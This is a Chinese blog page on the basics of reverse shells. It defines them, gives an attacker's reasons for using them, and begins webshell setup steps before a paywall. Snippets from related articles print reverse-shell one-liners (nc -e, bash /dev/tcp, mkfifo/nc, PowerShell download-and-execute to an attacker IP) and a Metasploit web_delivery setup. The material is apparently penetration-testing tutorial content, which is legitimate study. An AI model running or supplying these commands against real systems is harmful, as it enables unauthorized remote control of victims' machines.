反弹Shell的基本操作

最新推荐文章于 2025-10-05 11:19:35 发布
原创 最新推荐文章于 2025-10-05 11:19:35 发布 · 1.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #centos #架构

反弹shell定义:

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

操作:

1.在Java环境下通过哥斯拉获取php脚本,编辑名任取,这里为:123.php

请添加图片描述
请添加图片描述

2.将脚本123.php拉入centos中/var/www/html文件夹下

最低0.47元/天 解锁文章
深渊渔火
关注
反弹shell方法
Cwillchris的博客
05-04 737
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOSshell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹
渗透测试--反弹shell(1)
weixin_43520214的博客
09-18 1468
反弹shellReverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
linux 反弹shell
weixin_30426957的博客
06-30 275
Linux反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数,连接成功后立即关闭连接 ...
Shell反弹
最新发布
mjy60的博客
10-05 861
(1) PowerShell 反弹Shellpowershell -NoP -NonI -ExecutionPolicy Bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://攻击机IP/shell.ps1’)”- 或者直接反弹:$client = New-Object System.Net.Sockets.TCPClient(“攻击机IP”,4444);s.connect((“攻击机IP”,4444));
反弹shell
litiammmm的博客
07-29 1018
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shellreverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
网络安全渗透测试:操作系统命令与技巧用于文件操作及反弹Shell
11-17
最后,深入解析了如何利用反弹SHELL来实现数据回显与通信,并讨论了防火墙的绕过方法。 适合人群:对网络安全感兴趣的技术初学者,尤其是希望深入了解渗透测试领域的专业人士。 使用场景及目标:本指南旨在为读者...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
这种细致的分析有助于深入理解反弹shell的运作机制,并在实际操作中灵活应用。 通过本文的深度解析,读者可以了解到反弹shell的多样性和复杂性,以及如何根据具体需求选择合适的反弹方式。这对于提高渗透测试的专业...
精选资源
反弹shell资源:Rust实现的简单反弹Shell例子
05-18
反弹Shell的基本工作原理是:攻击者首先在目标系统上植入一个后门,该后门会在启动时连接回攻击者的控制端。当这个连接成功建立时,攻击者就可以通过这个通道发送命令并获取结果,从而实现对目标系统的远程控制。 ...
反弹shell方法汇总
2301_76786857的博客
01-10 2783
reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
linux 反弹shell 教程,浅析Linux之bash反弹shell原理
weixin_29716207的博客
05-04 547
环境攻击机:kali ip:192.168.25.144靶 机:centos ip:192.168.25.142过程kali 监听本地8888端口靶机 centos 写入 反弹shell 的命令bash -i >& /dev/tcp/192.168.25.144/8888 0>&1攻击机 kali 成功反弹shell原理反弹shel...
wsl反弹shell
03-21
### 关于在WSL中配置和使用反弹Shell #### 配置环境 在 Windows Subsystem for Linux (WSL) 中运行 Kali Linux 是一种常用的方式,尤其是在渗透测试场景下。为了实现反弹 Shell 的功能,首先需要确保 WSL 环境已经正确安装并配置了必要的工具和服务。 Kali Linux 提供了许多内置工具用于创建和管理反弹 Shell,例如 `nc` 和 Metasploit Framework。然而,在 WSL 下可能会遇到一些特定问题,比如底层命令支持不足或者网络通信受限等问题[^3]。 #### 使用 Netcat 创建反弹 Shell Netcat (`nc`) 是最常用的工具之一,可用于快速建立简单的 TCP 或 UDP 连接。以下是基于 Bash 的方法来设置一个基本的反弹 Shell: ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your_IP> <Your_Port> >/tmp/f ``` 上述脚本会在目标机器上打开指定端口并与攻击者的监听器建立连接[^1]。需要注意的是,这里的 `<Your_IP>` 应替换为实际控制机 IP 地址,而 `<Your_Port>` 则应设为目标开放端口号。 #### 设置Metasploit Payloads 对于更复杂的场景,可以利用 Metasploit 来生成定制化的 payload 文件。尽管在 WSL 上可能存在某些兼容性挑战,但仍可通过调整参数解决大多数问题。 以 Python reverse_tcp为例: ```ruby use exploit/multi/script/web_delivery set SRVHOST <Your_IP> set LPORT <Your_ListenPort> set URIPATH / run ``` 这段代码片段展示了如何通过 Web Delivery 技术向受害者发送恶意脚本文件,从而触发反连行为[^2]。 另外值得注意的是,当涉及到 CVE 类型的安全漏洞时,如提到过的 CVE-2019-0708,研究者们通常也会开发相应的 POC 工具帮助验证是否存在可被利用的风险点[^5]。这些高级技巧往往依赖具体业务逻辑以及操作系统版本等因素决定其可行性。 综上所述,在 WSL 平台上实施反弹 Shell 不仅涉及基础命令行操作还可能牵扯到复杂框架集成过程;因此建议使用者充分了解各组件工作原理后再动手实践以免造成不必要的损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值